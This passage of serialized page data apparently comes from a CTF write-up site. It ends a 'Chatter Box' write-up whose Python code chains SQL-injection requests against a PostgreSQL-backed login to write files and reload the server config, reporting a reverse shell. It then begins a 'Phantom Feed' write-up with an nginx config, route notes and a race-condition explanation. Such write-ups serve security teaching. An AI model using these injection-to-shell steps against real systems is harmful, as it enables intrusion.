headers=headers)\n",[28605],{"type":33,"tag":105,"props":28606,"children":28607},{"__ignoreMap":8},[28608,28632,28692,28720,28727,28791,28890,28938],{"type":33,"tag":128,"props":28609,"children":28610},{"class":130,"line":131},[28611,28615,28619,28624,28628],{"type":33,"tag":128,"props":28612,"children":28613},{"style":323},[28614],{"type":38,"value":28124},{"type":33,"tag":128,"props":28616,"children":28617},{"style":312},[28618],{"type":38,"value":315},{"type":33,"tag":128,"props":28620,"children":28621},{"style":323},[28622],{"type":38,"value":28623}," rand_num ",{"type":33,"tag":128,"props":28625,"children":28626},{"style":300},[28627],{"type":38,"value":25605},{"type":33,"tag":128,"props":28629,"children":28630},{"style":523},[28631],{"type":38,"value":1338},{"type":33,"tag":128,"props":28633,"children":28634},{"class":130,"line":362},[28635,28639,28643,28647,28651,28656,28660,28664,28668,28672,28676,28680,28684,28688],{"type":33,"tag":128,"props":28636,"children":28637},{"style":1576},[28638],{"type":38,"value":28184},{"type":33,"tag":128,"props":28640,"children":28641},{"style":437},[28642],{"type":38,"value":10725},{"type":33,"tag":128,"props":28644,"children":28645},{"style":312},[28646],{"type":38,"value":5566},{"type":33,"tag":128,"props":28648,"children":28649},{"style":676},[28650],{"type":38,"value":669},{"type":33,"tag":128,"props":28652,"children":28653},{"style":140},[28654],{"type":38,"value":28655},"files/cert.b64",{"type":33,"tag":128,"props":28657,"children":28658},{"style":676},[28659],{"type":38,"value":669},{"type":33,"tag":128,"props":28661,"children":28662},{"style":312},[28663],{"type":38,"value":5584},{"type":33,"tag":128,"props":28665,"children":28666},{"style":676},[28667],{"type":38,"value":679},{"type":33,"tag":128,"props":28669,"children":28670},{"style":140},[28671],{"type":38,"value":10916},{"type":33,"tag":128,"props":28673,"children":28674},{"style":676},[28675],{"type":38,"value":669},{"type":33,"tag":128,"props":28677,"children":28678},{"style":312},[28679],{"type":38,"value":2966},{"type":33,"tag":128,"props":28681,"children":28682},{"style":1576},[28683],{"type":38,"value":10759},{"type":33,"tag":128,"props":28685,"children":28686},{"style":323},[28687],{"type":38,"value":10534},{"type":33,"tag":128,"props":28689,"children":28690},{"style":312},[28691],{"type":38,"value":5318},{"type":33,"tag":128,"props":28693,"children":28694},{"class":130,"line":403},[28695,28700,28704,28708,28712,28716],{"type":33,"tag":128,"props":28696,"children":28697},{"style":323},[28698],{"type":38,"value":28699}," cert ",{"type":33,"tag":128,"props":28701,"children":28702},{"style":312},[28703],{"type":38,"value":315},{"type":33,"tag":128,"props":28705,"children":28706},{"style":323},[28707],{"type":38,"value":10534},{"type":33,"tag":128,"props":28709,"children":28710},{"style":312},[28711],{"type":38,"value":215},{"type":33,"tag":128,"props":28713,"children":28714},{"style":323},[28715],{"type":38,"value":10810},{"type":33,"tag":128,"props":28717,"children":28718},{"style":312},[28719],{"type":38,"value":7857},{"type":33,"tag":128,"props":28721,"children":28722},{"class":130,"line":739},[28723],{"type":33,"tag":128,"props":28724,"children":28725},{"emptyLinePlaceholder":896},[28726],{"type":38,"value":899},{"type":33,"tag":128,"props":28728,"children":28729},{"class":130,"line":765},[28730,28734,28738,28742,28746,28750,28754,28758,28762,28766,28770,28774,28779,28783,28787],{"type":33,"tag":128,"props":28731,"children":28732},{"style":323},[28733],{"type":38,"value":28279},{"type":33,"tag":128,"props":28735,"children":28736},{"style":312},[28737],{"type":38,"value":315},{"type":33,"tag":128,"props":28739,"children":28740},{"style":323},[28741],{"type":38,"value":25709},{"type":33,"tag":128,"props":28743,"children":28744},{"style":312},[28745],{"type":38,"value":5566},{"type":33,"tag":128,"props":28747,"children":28748},{"style":300},[28749],{"type":38,"value":11107},{"type":33,"tag":128,"props":28751,"children":28752},{"style":140},[28753],{"type":38,"value":28300},{"type":33,"tag":128,"props":28755,"children":28756},{"style":151},[28757],{"type":38,"value":7246},{"type":33,"tag":128,"props":28759,"children":28760},{"style":323},[28761],{"type":38,"value":28309},{"type":33,"tag":128,"props":28763,"children":28764},{"style":151},[28765],{"type":38,"value":5730},{"type":33,"tag":128,"props":28767,"children":28768},{"style":140},[28769],{"type":38,"value":11130},{"type":33,"tag":128,"props":28771,"children":28772},{"style":151},[28773],{"type":38,"value":7246},{"type":33,"tag":128,"props":28775,"children":28776},{"style":323},[28777],{"type":38,"value":28778},"cert",{"type":33,"tag":128,"props":28780,"children":28781},{"style":151},[28782],{"type":38,"value":5730},{"type":33,"tag":128,"props":28784,"children":28785},{"style":140},[28786],{"type":38,"value":28334},{"type":33,"tag":128,"props":28788,"children":28789},{"style":312},[28790],{"type":38,"value":2427},{"type":33,"tag":128,"props":28792,"children":28793},{"class":130,"line":804},[28794,28798,28802,28806,28810,28814,28818,28822,28826,28830,28834,28838,28842,28846,28850,28854,28858,28862,28866,28870,28874,28878,28882,28886],{"type":33,"tag":128,"props":28795,"children":28796},{"style":323},[28797],{"type":38,"value":28346},{"type":33,"tag":128,"props":28799,"children":28800},{"style":312},[28801],{"type":38,"value":315},{"type":33,"tag":128,"props":28803,"children":28804},{"style":323},[28805],{"type":38,"value":10587},{"type":33,"tag":128,"props":28807,"children":28808},{"style":312},[28809],{"type":38,"value":215},{"type":33,"tag":128,"props":28811,"children":28812},{"style":323},[28813],{"type":38,"value":5561},{"type":33,"tag":128,"props":28815,"children":28816},{"style":312},[28817],{"type":38,"value":5566},{"type":33,"tag":128,"props":28819,"children":28820},{"style":151},[28821],{"type":38,"value":28371},{"type":33,"tag":128,"props":28823,"children":28824},{"style":312},[28825],{"type":38,"value":5584},{"type":33,"tag":128,"props":28827,"children":28828},{"style":306},[28829],{"type":38,"value":13545},{"type":33,"tag":128,"props":28831,"children":28832},{"style":312},[28833],{"type":38,"value":315},{"type":33,"tag":128,"props":28835,"children":28836},{"style":676},[28837],{"type":38,"value":669},{"type":33,"tag":128,"props":28839,"children":28840},{"style":140},[28841],{"type":38,"value":28392},{"type":33,"tag":128,"props":28843,"children":28844},{"style":676},[28845],{"type":38,"value":669},{"type":33,"tag":128,"props":28847,"children":28848},{"style":300},[28849],{"type":38,"value":25605},{"type":33,"tag":128,"props":28851,"children":28852},{"style":323},[28853],{"type":38,"value":5810},{"type":33,"tag":128,"props":28855,"children":28856},{"style":300},[28857],{"type":38,"value":25605},{"type":33,"tag":128,"props":28859,"children":28860},{"style":676},[28861],{"type":38,"value":669},{"type":33,"tag":128,"props":28863,"children":28864},{"style":140},[28865],{"type":38,"value":28417},{"type":33,"tag":128,"props":28867,"children":28868},{"style":676},[28869],{"type":38,"value":669},{"type":33,"tag":128,"props":28871,"children":28872},{"style":312},[28873],{"type":38,"value":5584},{"type":33,"tag":128,"props":28875,"children":28876},{"style":306},[28877],{"type":38,"value":10612},{"type":33,"tag":128,"props":28879,"children":28880},{"style":312},[28881],{"type":38,"value":315},{"type":33,"tag":128,"props":28883,"children":28884},{"style":323},[28885],{"type":38,"value":10621},{"type":33,"tag":128,"props":28887,"children":28888},{"style":312},[28889],{"type":38,"value":2427},{"type":33,"tag":128,"props":28891,"children":28892},{"class":130,"line":839},[28893,28897,28901,28905,28909,28913,28917,28921,28925,28929,28934],{"type":33,"tag":128,"props":28894,"children":28895},{"style":323},[28896],{"type":38,"value":28279},{"type":33,"tag":128,"props":28898,"children":28899},{"style":312},[28900],{"type":38,"value":315},{"type":33,"tag":128,"props":28902,"children":28903},{"style":323},[28904],{"type":38,"value":25709},{"type":33,"tag":128,"props":28906,"children":28907},{"style":312},[28908],{"type":38,"value":5566},{"type":33,"tag":128,"props":28910,"children":28911},{"style":300},[28912],{"type":38,"value":11107},{"type":33,"tag":128,"props":28914,"children":28915},{"style":140},[28916],{"type":38,"value":28469},{"type":33,"tag":128,"props":28918,"children":28919},{"style":151},[28920],{"type":38,"value":7246},{"type":33,"tag":128,"props":28922,"children":28923},{"style":323},[28924],{"type":38,"value":28309},{"type":33,"tag":128,"props":28926,"children":28927},{"style":151},[28928],{"type":38,"value":5730},{"type":33,"tag":128,"props":28930,"children":28931},{"style":140},[28932],{"type":38,"value":28933},", '/var/lib/postgresql/13/main/PG_VERSION'))\"",{"type":33,"tag":128,"props":28935,"children":28936},{"style":312},[28937],{"type":38,"value":2427},{"type":33,"tag":128,"props":28939,"children":28940},{"class":130,"line":848},[28941,28945,28949,28953,28957,28961,28965,28969,28973,28977,28981,28985,28989,28993,28997,29001,29005,29009,29013,29017,29021,29025,29029,29033],{"type":33,"tag":128,"props":28942,"children":28943},{"style":323},[28944],{"type":38,"value":28346},{"type":33,"tag":128,"props":28946,"children":28947},{"style":312},[28948],{"type":38,"value":315},{"type":33,"tag":128,"props":28950,"children":28951},{"style":323},[28952],{"type":38,"value":10587},{"type":33,"tag":128,"props":28954,"children":28955},{"style":312},[28956],{"type":38,"value":215},{"type":33,"tag":128,"props":28958,"children":28959},{"style":323},[28960],{"type":38,"value":5561},{"type":33,"tag":128,"props":28962,"children":28963},{"style":312},[28964],{"type":38,"value":5566},{"type":33,"tag":128,"props":28966,"children":28967},{"style":151},[28968],{"type":38,"value":28371},{"type":33,"tag":128,"props":28970,"children":28971},{"style":312},[28972],{"type":38,"value":5584},{"type":33,"tag":128,"props":28974,"children":28975},{"style":306},[28976],{"type":38,"value":13545},{"type":33,"tag":128,"props":28978,"children":28979},{"style":312},[28980],{"type":38,"value":315},{"type":33,"tag":128,"props":28982,"children":28983},{"style":676},[28984],{"type":38,"value":669},{"type":33,"tag":128,"props":28986,"children":28987},{"style":140},[28988],{"type":38,"value":28392},{"type":33,"tag":128,"props":28990,"children":28991},{"style":676},[28992],{"type":38,"value":669},{"type":33,"tag":128,"props":28994,"children":28995},{"style":300},[28996],{"type":38,"value":25605},{"type":33,"tag":128,"props":28998,"children":28999},{"style":323},[29000],{"type":38,"value":5810},{"type":33,"tag":128,"props":29002,"children":29003},{"style":300},[29004],{"type":38,"value":25605},{"type":33,"tag":128,"props":29006,"children":29007},{"style":676},[29008],{"type":38,"value":669},{"type":33,"tag":128,"props":29010,"children":29011},{"style":140},[29012],{"type":38,"value":28417},{"type":33,"tag":128,"props":29014,"children":29015},{"style":676},[29016],{"type":38,"value":669},{"type":33,"tag":128,"props":29018,"children":29019},{"style":312},[29020],{"type":38,"value":5584},{"type":33,"tag":128,"props":29022,"children":29023},{"style":306},[29024],{"type":38,"value":10612},{"type":33,"tag":128,"props":29026,"children":29027},{"style":312},[29028],{"type":38,"value":315},{"type":33,"tag":128,"props":29030,"children":29031},{"style":323},[29032],{"type":38,"value":10621},{"type":33,"tag":128,"props":29034,"children":29035},{"style":312},[29036],{"type":38,"value":2427},{"type":33,"tag":239,"props":29038,"children":29039},{},[29040],{"type":33,"tag":243,"props":29041,"children":29042},{},[29043],{"type":38,"value":29044},"Reload the postgresql configuration:",{"type":33,"tag":114,"props":29046,"children":29047},{"lang":10227},[29048],{"type":33,"tag":119,"props":29049,"children":29051},{"code":29050,"language":10227,"meta":8,"className":10231,"style":8},"query = get_payload(f\"SELECT pg_reload_conf()\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[29052],{"type":33,"tag":105,"props":29053,"children":29054},{"__ignoreMap":8},[29055,29086],{"type":33,"tag":128,"props":29056,"children":29057},{"class":130,"line":131},[29058,29062,29066,29070,29074,29078,29082],{"type":33,"tag":128,"props":29059,"children":29060},{"style":323},[29061],{"type":38,"value":28279},{"type":33,"tag":128,"props":29063,"children":29064},{"style":312},[29065],{"type":38,"value":315},{"type":33,"tag":128,"props":29067,"children":29068},{"style":323},[29069],{"type":38,"value":25709},{"type":33,"tag":128,"props":29071,"children":29072},{"style":312},[29073],{"type":38,"value":5566},{"type":33,"tag":128,"props":29075,"children":29076},{"style":300},[29077],{"type":38,"value":11107},{"type":33,"tag":128,"props":29079,"children":29080},{"style":140},[29081],{"type":38,"value":11410},{"type":33,"tag":128,"props":29083,"children":29084},{"style":312},[29085],{"type":38,"value":2427},{"type":33,"tag":128,"props":29087,"children":29088},{"class":130,"line":362},[29089,29093,29097,29101,29105,29109,29113,29117,29121,29125,29129,29133,29137,29141,29145,29149,29153,29157,29161,29165,29169,29173,29177,29181],{"type":33,"tag":128,"props":29090,"children":29091},{"style":323},[29092],{"type":38,"value":28346},{"type":33,"tag":128,"props":29094,"children":29095},{"style":312},[29096],{"type":38,"value":315},{"type":33,"tag":128,"props":29098,"children":29099},{"style":323},[29100],{"type":38,"value":10587},{"type":33,"tag":128,"props":29102,"children":29103},{"style":312},[29104],{"type":38,"value":215},{"type":33,"tag":128,"props":29106,"children":29107},{"style":323},[29108],{"type":38,"value":5561},{"type":33,"tag":128,"props":29110,"children":29111},{"style":312},[29112],{"type":38,"value":5566},{"type":33,"tag":128,"props":29114,"children":29115},{"style":151},[29116],{"type":38,"value":28371},{"type":33,"tag":128,"props":29118,"children":29119},{"style":312},[29120],{"type":38,"value":5584},{"type":33,"tag":128,"props":29122,"children":29123},{"style":306},[29124],{"type":38,"value":13545},{"type":33,"tag":128,"props":29126,"children":29127},{"style":312},[29128],{"type":38,"value":315},{"type":33,"tag":128,"props":29130,"children":29131},{"style":676},[29132],{"type":38,"value":669},{"type":33,"tag":128,"props":29134,"children":29135},{"style":140},[29136],{"type":38,"value":28392},{"type":33,"tag":128,"props":29138,"children":29139},{"style":676},[29140],{"type":38,"value":669},{"type":33,"tag":128,"props":29142,"children":29143},{"style":300},[29144],{"type":38,"value":25605},{"type":33,"tag":128,"props":29146,"children":29147},{"style":323},[29148],{"type":38,"value":5810},{"type":33,"tag":128,"props":29150,"children":29151},{"style":300},[29152],{"type":38,"value":25605},{"type":33,"tag":128,"props":29154,"children":29155},{"style":676},[29156],{"type":38,"value":669},{"type":33,"tag":128,"props":29158,"children":29159},{"style":140},[29160],{"type":38,"value":28417},{"type":33,"tag":128,"props":29162,"children":29163},{"style":676},[29164],{"type":38,"value":669},{"type":33,"tag":128,"props":29166,"children":29167},{"style":312},[29168],{"type":38,"value":5584},{"type":33,"tag":128,"props":29170,"children":29171},{"style":306},[29172],{"type":38,"value":10612},{"type":33,"tag":128,"props":29174,"children":29175},{"style":312},[29176],{"type":38,"value":315},{"type":33,"tag":128,"props":29178,"children":29179},{"style":323},[29180],{"type":38,"value":10621},{"type":33,"tag":128,"props":29182,"children":29183},{"style":312},[29184],{"type":38,"value":2427},{"type":33,"tag":47,"props":29186,"children":29187},{},[29188,29190,29196,29198,29204],{"type":38,"value":29189},"Note that the ",{"type":33,"tag":105,"props":29191,"children":29193},{"className":29192},[],[29194],{"type":38,"value":29195},"get_payload()",{"type":38,"value":29197}," function allows us to generate our sqli payload as seen previously in ",{"type":33,"tag":53,"props":29199,"children":29201},{"href":29200},"#sql-injection",[29202],{"type":38,"value":29203},"part 3",{"type":38,"value":215},{"type":33,"tag":47,"props":29206,"children":29207},{},[29208],{"type":38,"value":29209},"After reloading the configuration we can see that the reverse shell has been executed well allowing us to obtain the flag.",{"type":33,"tag":75,"props":29211,"children":29213},{"imgSrc":29212},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559298/writeups/chatter-box/rev_shell.webp",[],{"type":33,"tag":5227,"props":29215,"children":29216},{},[29217],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":29219},[29220,29221,29222,29223,29224],{"id":42,"depth":362,"text":45},{"id":22881,"depth":362,"text":22884},{"id":25541,"depth":362,"text":25544},{"id":27685,"depth":362,"text":27688},{"id":21053,"depth":362,"text":21056},"content:writeups:chatter-box.md","writeups/chatter-box.md","writeups/chatter-box",{"_path":29229,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":29230,"description":8,"head":29231,"body":29249,"_type":5240,"_id":35014,"_source":5242,"_file":35015,"_stem":35016,"_extension":5245},"/writeups/phantom-feed","Phantom Feed",{"title":29230,"description":29232,"keywords":29233,"slug":29234,"image":29235,"date":29236,"meta":29237},"Writeup of Phantom Feed a hard web challenge from htb-uni ctf 2023. Is about race condition and XSS.","web,race-condition,xss,oauth2,CVE-2023-33733","phantom-feed","https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230872/writeups/htb-uni-2023.webp","2023-12-08",[29238,29239,29240,29241,29242,29244,29245,29247],{"og:image":29235},{"og:title":29230},{"og:description":29232},{"og:type":21},{"og:url":29243},"https://owalid.com/phantom-feed",{"description":29232},{"title":29246},"Phantom Feed writeup",{"keywords":29248},"web,race-condition,xss,oauth2,CVE-2023-33733,htb,ctf,writeup",{"type":30,"children":29250,"toc":35007},[29251,29255,29259,29264,29269,29274,29437,29443,29448,29454,29459,29467,29500,29508,29513,29519,29524,29531,29544,29551,29556,29562,29568,29573,29588,29594,29599,29603,29608,29612,29625,30061,30314,30319,30586,30591,30603,30641,30646,31030,31035,31040,31410,31415,31419,31424,31429,31433,31438,31442,31448,31453,31473,32133,32138,32144,32157,32162,32206,32209,32247,32251,32306,32326,32331,32335,32340,32344,32365,32369,32374,32379,32467,32472,33474,33479,33484,33497,33502,33506,33511,33548,33572,33584,33588,33594,33607,33626,33638,33642,33647,33651,33656,33660,33665,33671,33676,34285,34305,34317,34427,34432,34437,34928,34941,34955,34963,34968,34985,34990,34994,34999,35003],{"type":33,"tag":34,"props":29252,"children":29253},{"id":29234},[29254],{"type":38,"value":29230},{"type":33,"tag":40,"props":29256,"children":29257},{"id":42},[29258],{"type":38,"value":45},{"type":33,"tag":47,"props":29260,"children":29261},{},[29262],{"type":38,"value":29263},"Phantom Feed is a hard web challenge from htb-uni ctf 2023. There are a lot of files in this chal, in total there are 3 web services running.",{"type":33,"tag":75,"props":29265,"children":29268},{"imgSrc":29266,":width":29267},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704223463/writeups/phantom-feed/folder-expanded.webp","300",[],{"type":33,"tag":47,"props":29270,"children":29271},{},[29272],{"type":38,"value":29273},"Below you will find the nginx configuration for the challenges:",{"type":33,"tag":114,"props":29275,"children":29276},{"lang":8945},[29277],{"type":33,"tag":119,"props":29278,"children":29280},{"className":8949,"code":29279,"language":8945,"meta":8,"style":8},"http {\n server {\n listen 1337;\n server_name pantomfeed;\n \n location / {\n proxy_pass http://127.0.0.1:5000;\n }\n\n location /phantomfeed {\n proxy_pass http://127.0.0.1:3000;\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n }\n\n location /backend {\n proxy_pass http://127.0.0.1:4000;\n }\n }\n}\n",[29281],{"type":33,"tag":105,"props":29282,"children":29283},{"__ignoreMap":8},[29284,29292,29300,29308,29316,29324,29332,29340,29347,29354,29362,29370,29378,29386,29393,29400,29408,29416,29423,29430],{"type":33,"tag":128,"props":29285,"children":29286},{"class":130,"line":131},[29287],{"type":33,"tag":128,"props":29288,"children":29289},{},[29290],{"type":38,"value":29291},"http {\n",{"type":33,"tag":128,"props":29293,"children":29294},{"class":130,"line":362},[29295],{"type":33,"tag":128,"props":29296,"children":29297},{},[29298],{"type":38,"value":29299}," server {\n",{"type":33,"tag":128,"props":29301,"children":29302},{"class":130,"line":403},[29303],{"type":33,"tag":128,"props":29304,"children":29305},{},[29306],{"type":38,"value":29307}," listen 1337;\n",{"type":33,"tag":128,"props":29309,"children":29310},{"class":130,"line":739},[29311],{"type":33,"tag":128,"props":29312,"children":29313},{},[29314],{"type":38,"value":29315}," server_name pantomfeed;\n",{"type":33,"tag":128,"props":29317,"children":29318},{"class":130,"line":765},[29319],{"type":33,"tag":128,"props":29320,"children":29321},{},[29322],{"type":38,"value":29323}," \n",{"type":33,"tag":128,"props":29325,"children":29326},{"class":130,"line":804},[29327],{"type":33,"tag":128,"props":29328,"children":29329},{},[29330],{"type":38,"value":29331}," location / {\n",{"type":33,"tag":128,"props":29333,"children":29334},{"class":130,"line":839},[29335],{"type":33,"tag":128,"props":29336,"children":29337},{},[29338],{"type":38,"value":29339}," proxy_pass http://127.0.0.1:5000;\n",{"type":33,"tag":128,"props":29341,"children":29342},{"class":130,"line":848},[29343],{"type":33,"tag":128,"props":29344,"children":29345},{},[29346],{"type":38,"value":15318},{"type":33,"tag":128,"props":29348,"children":29349},{"class":130,"line":976},[29350],{"type":33,"tag":128,"props":29351,"children":29352},{"emptyLinePlaceholder":896},[29353],{"type":38,"value":899},{"type":33,"tag":128,"props":29355,"children":29356},{"class":130,"line":988},[29357],{"type":33,"tag":128,"props":29358,"children":29359},{},[29360],{"type":38,"value":29361}," location /phantomfeed {\n",{"type":33,"tag":128,"props":29363,"children":29364},{"class":130,"line":1001},[29365],{"type":33,"tag":128,"props":29366,"children":29367},{},[29368],{"type":38,"value":29369}," proxy_pass http://127.0.0.1:3000;\n",{"type":33,"tag":128,"props":29371,"children":29372},{"class":130,"line":1014},[29373],{"type":33,"tag":128,"props":29374,"children":29375},{},[29376],{"type":38,"value":29377}," proxy_set_header Host $host;\n",{"type":33,"tag":128,"props":29379,"children":29380},{"class":130,"line":1026},[29381],{"type":33,"tag":128,"props":29382,"children":29383},{},[29384],{"type":38,"value":29385}," proxy_set_header X-Real-IP $remote_addr;\n",{"type":33,"tag":128,"props":29387,"children":29388},{"class":130,"line":1038},[29389],{"type":33,"tag":128,"props":29390,"children":29391},{},[29392],{"type":38,"value":15318},{"type":33,"tag":128,"props":29394,"children":29395},{"class":130,"line":1051},[29396],{"type":33,"tag":128,"props":29397,"children":29398},{"emptyLinePlaceholder":896},[29399],{"type":38,"value":899},{"type":33,"tag":128,"props":29401,"children":29402},{"class":130,"line":1063},[29403],{"type":33,"tag":128,"props":29404,"children":29405},{},[29406],{"type":38,"value":29407}," location /backend {\n",{"type":33,"tag":128,"props":29409,"children":29410},{"class":130,"line":1076},[29411],{"type":33,"tag":128,"props":29412,"children":29413},{},[29414],{"type":38,"value":29415}," proxy_pass http://127.0.0.1:4000;\n",{"type":33,"tag":128,"props":29417,"children":29418},{"class":130,"line":1089},[29419],{"type":33,"tag":128,"props":29420,"children":29421},{},[29422],{"type":38,"value":15318},{"type":33,"tag":128,"props":29424,"children":29425},{"class":130,"line":1101},[29426],{"type":33,"tag":128,"props":29427,"children":29428},{},[29429],{"type":38,"value":6760},{"type":33,"tag":128,"props":29431,"children":29432},{"class":130,"line":1114},[29433],{"type":33,"tag":128,"props":29434,"children":29435},{},[29436],{"type":38,"value":854},{"type":33,"tag":81,"props":29438,"children":29440},{"id":29439},"port-5000",[29441],{"type":38,"value":29442},"Port 5000:",{"type":33,"tag":47,"props":29444,"children":29445},{},[29446],{"type":38,"value":29447},"This service is a Vue.js application, this frontend application interacts with the backend service (4000).",{"type":33,"tag":81,"props":29449,"children":29451},{"id":29450},"port-3000",[29452],{"type":38,"value":29453},"Port 3000:",{"type":33,"tag":47,"props":29455,"children":29456},{},[29457],{"type":38,"value":29458},"This service is Flask application it allows a user to log in and generate a token via oauth2 to use in the Vue.js application.",{"type":33,"tag":47,"props":29460,"children":29461},{},[29462],{"type":33,"tag":2302,"props":29463,"children":29464},{},[29465],{"type":38,"value":29466},"Interesting routes:",{"type":33,"tag":239,"props":29468,"children":29469},{},[29470,29475,29480,29485,29490,29495],{"type":33,"tag":243,"props":29471,"children":29472},{},[29473],{"type":38,"value":29474},"GET/POST /login - No middleware - Renders a login form (GET) and handles user authentication (POST).",{"type":33,"tag":243,"props":29476,"children":29477},{},[29478],{"type":38,"value":29479},"GET/POST /register - No middleware - Renders a registration form (GET) and handles user registration (POST).",{"type":33,"tag":243,"props":29481,"children":29482},{},[29483],{"type":38,"value":29484},"GET/POST /feed - auth_middleware - Displays posts (GET) and creates new posts (POST) after parameter validation, it also handles the bot (POST).",{"type":33,"tag":243,"props":29486,"children":29487},{},[29488],{"type":38,"value":29489},"GET /oauth2/auth - auth_middleware - Manages OAuth2 authorization by rendering an authorization page.",{"type":33,"tag":243,"props":29491,"children":29492},{},[29493],{"type":38,"value":29494},"GET /oauth2/code - auth_middleware - Generates an authorization code and redirects to the specified redirect_url.",{"type":33,"tag":243,"props":29496,"children":29497},{},[29498],{"type":38,"value":29499},"GET /oauth2/token - auth_middleware - Validates an authorization code and generates an access token in JSON format.",{"type":33,"tag":47,"props":29501,"children":29502},{},[29503],{"type":33,"tag":2302,"props":29504,"children":29505},{},[29506],{"type":38,"value":29507},"Middleware:",{"type":33,"tag":47,"props":29509,"children":29510},{},[29511],{"type":38,"value":29512},"The middleware ensures that certain routes are accessible only to authenticated users by redirecting to the login page if authentication fails or if the token is missing or invalid.",{"type":33,"tag":81,"props":29514,"children":29516},{"id":29515},"port-4000",[29517],{"type":38,"value":29518},"Port 4000:",{"type":33,"tag":47,"props":29520,"children":29521},{},[29522],{"type":38,"value":29523},"This service is Flask application it allows to get some products and orders.",{"type":33,"tag":47,"props":29525,"children":29526},{},[29527],{"type":33,"tag":2302,"props":29528,"children":29529},{},[29530],{"type":38,"value":29466},{"type":33,"tag":239,"props":29532,"children":29533},{},[29534,29539],{"type":33,"tag":243,"props":29535,"children":29536},{},[29537],{"type":38,"value":29538},"GET / - No middleware - Returns an \"OK\" response.",{"type":33,"tag":243,"props":29540,"children":29541},{},[29542],{"type":38,"value":29543},"POST /orders/html - admin_middleware - Generates a PDF file containing orders in HTML format (Restricted to administrators).",{"type":33,"tag":47,"props":29545,"children":29546},{},[29547],{"type":33,"tag":2302,"props":29548,"children":29549},{},[29550],{"type":38,"value":29507},{"type":33,"tag":47,"props":29552,"children":29553},{},[29554],{"type":38,"value":29555},"The middleware admin_middleware is utilized to limit access to certain routes, only to users classified as administrators.",{"type":33,"tag":40,"props":29557,"children":29559},{"id":29558},"race-condition",[29560],{"type":38,"value":29561},"Race Condition",{"type":33,"tag":88,"props":29563,"children":29565},{"id":29564},"what-is-race-condition",[29566],{"type":38,"value":29567},"What is race condition?",{"type":33,"tag":47,"props":29569,"children":29570},{},[29571],{"type":38,"value":29572},"Before starting, it is important to recall what a race condition is:",{"type":33,"tag":22891,"props":29574,"children":29575},{},[29576],{"type":33,"tag":47,"props":29577,"children":29578},{},[29579,29581],{"type":38,"value":29580},"Race conditions are a common type of vulnerability closely related to business logic flaws. They occur when websites process requests concurrently without adequate safeguards. This can lead to multiple distinct threads interacting with the same data at the same time, resulting in a \"collision\" that causes unintended behavior in the application. ",{"type":33,"tag":53,"props":29582,"children":29585},{":target":21222,"href":29583,"rel":29584},"https://portswigger.net/web-security/race-conditions",[57],[29586],{"type":38,"value":29587},"Portswigger",{"type":33,"tag":88,"props":29589,"children":29591},{"id":29590},"initial-entry",[29592],{"type":38,"value":29593},"Initial entry",{"type":33,"tag":47,"props":29595,"children":29596},{},[29597],{"type":38,"value":29598},"Based on the numerous services, the initial entry point would be the token generation service (port 3000). The API that generates tokens has a route for registering a user. The first blocking point is that a message indicates that an email has been sent to us. However, no mail service is launched in the challenge.",{"type":33,"tag":75,"props":29600,"children":29602},{"imgSrc":29601},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230708/writeups/phantom-feed/email_code_sent.webp",[],{"type":33,"tag":47,"props":29604,"children":29605},{},[29606],{"type":38,"value":29607},"And when we try to log in, we can see that the account is not verified.",{"type":33,"tag":75,"props":29609,"children":29611},{"imgSrc":29610},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230615/writeups/phantom-feed/not_verified.webp",[],{"type":33,"tag":47,"props":29613,"children":29614},{},[29615,29617,29623],{"type":38,"value":29616},"We can see in the code that a boolean attribute ",{"type":33,"tag":105,"props":29618,"children":29620},{"className":29619},[],[29621],{"type":38,"value":29622},"verified",{"type":38,"value":29624}," is set to False during registration. Therefore, we need to find a way to bypass it in order to have a valid account.",{"type":33,"tag":114,"props":29626,"children":29627},{"lang":10227},[29628],{"type":33,"tag":119,"props":29629,"children":29631},{"className":10231,"code":29630,"language":10227,"meta":8,"style":8},"@web.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n [...]\n user_valid, user_id = db_session.create_user(username, password, email) # \u003C--- Here the account is created\n [...]\n email_client = EmailClient(email)\n verification_code = db_session.add_verification(user_id) # \u003C--- Here is the boolean set to False\n email_client.send_email(f\"http://phantomfeed.htb/phantomfeed/confirm?verification_code={verification_code}\")\n \n return render_template(\"error.html\", title=\"error\", error=\"verification code sent\"), 200\n",[29632],{"type":33,"tag":105,"props":29633,"children":29634},{"__ignoreMap":8},[29635,29722,29738,29755,29826,29841,29871,29914,29965,29972],{"type":33,"tag":128,"props":29636,"children":29637},{"class":130,"line":131},[29638,29643,29648,29652,29657,29661,29665,29670,29674,29678,29683,29688,29692,29697,29701,29705,29709,29713,29717],{"type":33,"tag":128,"props":29639,"children":29640},{"style":312},[29641],{"type":38,"value":29642},"@",{"type":33,"tag":128,"props":29644,"children":29645},{"style":135},[29646],{"type":38,"value":29647},"web",{"type":33,"tag":128,"props":29649,"children":29650},{"style":312},[29651],{"type":38,"value":215},{"type":33,"tag":128,"props":29653,"children":29654},{"style":135},[29655],{"type":38,"value":29656},"route",{"type":33,"tag":128,"props":29658,"children":29659},{"style":312},[29660],{"type":38,"value":5566},{"type":33,"tag":128,"props":29662,"children":29663},{"style":676},[29664],{"type":38,"value":669},{"type":33,"tag":128,"props":29666,"children":29667},{"style":140},[29668],{"type":38,"value":29669},"/register",{"type":33,"tag":128,"props":29671,"children":29672},{"style":676},[29673],{"type":38,"value":669},{"type":33,"tag":128,"props":29675,"children":29676},{"style":312},[29677],{"type":38,"value":5584},{"type":33,"tag":128,"props":29679,"children":29680},{"style":306},[29681],{"type":38,"value":29682}," 